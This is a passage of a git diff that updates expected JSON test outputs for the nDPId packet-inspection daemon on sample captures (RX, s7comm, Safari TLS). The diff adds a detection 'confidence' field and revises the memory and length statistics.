+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299986,"flow_last_seen":1460647300017,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1460647300017,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1460647300017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1460647300017,"pkt":"PIqwbTfwAAjK968mCABFAABd9xIAAEARlT6DctuowKfOfBtZG1gASacR1w+zMFwiT7QAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RX","breed":"Acceptable","category":"RPC"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","total-events-serialized":32}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 132/132
@@ -38,9 +38,9 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4603457 bytes
-~~ total memory freed........: 4603457 bytes
-~~ total allocations/frees...: 99697/99697
+~~ total memory allocated....: 4687098 bytes
+~~ total memory freed........: 4687098 bytes
+~~ total allocations/frees...: 101287/101287
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
 ~~ json string max len.......: 1892 chars
diff --git a/test/results/s7comm.pcap.out b/test/results/s7comm.pcap.out
index c4bd29bf7..12c00af47 100644
--- a/test/results/s7comm.pcap.out
+++ b/test/results/s7comm.pcap.out
@@ -1,10 +1,10 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"s7comm.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1408528803880,"pkt":"ABsbI+s7kOa6hF5BCABFAAA+LUtAAIAGAADAqAEKwKgBKBBZAGaQRN2iAAL7EFAY+vCDswAAAwAAFhHgAAAABwDBAgEAwgIBAsABCg=="}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"proto":"s7comm","breed":"Acceptable","category":"Network"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1408528803880,"flow_last_seen":1408528803880,"flow_idle_time":7440000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":1,"ts_msec":1408528803880,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1408528803884,"pkt":"kOa6hF5BABsbI+s7CABFAAA+AM4AAB4GGGrAqAEowKgBCgBmEFkAAvsQkETduFAYEAAGowAAAwAAFhHQAAcAAwDAAQrBAgEAwgIBAg=="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1408528803884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1408528803884,"pkt":"ABsbI+s7kOa6hF5BCABFAABBLUxAAIAGAADAqAEKwKgBKBBZAGaQRN24AAL7JlAY+tqDtgAAAwAAGQLwgDIBAAACAAAIAADwAAABAAEB4A=="}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"s7comm","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1408528803880,"flow_last_seen":1408528804016,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":2290,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1408528804016,"l3_proto":"ip4","src_ip":"192.168.1.10","dst_ip":"192.168.1.40","src_port":4185,"dst_port":102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"s7comm","breed":"Acceptable","category":"Network"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":55,"source":"s7comm.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 55/55
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596424 bytes
-~~ total memory freed........: 4596424 bytes
-~~ total allocations/frees...: 99608/99608
+~~ total memory allocated....: 4681377 bytes
+~~ total memory freed........: 4681377 bytes
+~~ total allocations/frees...: 101198/101198
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 652 chars
-~~ json string avg len.......: 467 chars
+~~ json string max len.......: 678 chars
+~~ json string avg len.......: 480 chars
diff --git a/test/results/safari.pcap.out b/test/results/safari.pcap.out
index e2b8d4b1f..890cc5e01 100644
--- a/test/results/safari.pcap.out
+++ b/test/results/safari.pcap.out
@@ -3,9 +3,9 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620898024056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620898024056,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfeAbt7aT+8AAAAALAC\/\/8bGAAAAgQFtAEDAwUBAQgKMzDFWAAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620898024084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620898024084,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7194MY\/Pce2k\/vaAS\/ohIgwAAAgQFrAQCCAo6VqpvMzDFWAEDAwc="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620898024085,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfeAbt7aT+9DGPz3YAQECxliAAAAQEICjMwxXQ6Vqpv"}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01179{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898024056,"flow_last_seen":1620898024085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1620898024085,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898024056,"flow_last_seen":1620898024120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"ts_msec":1620898024120,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -24,32 +24,32 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
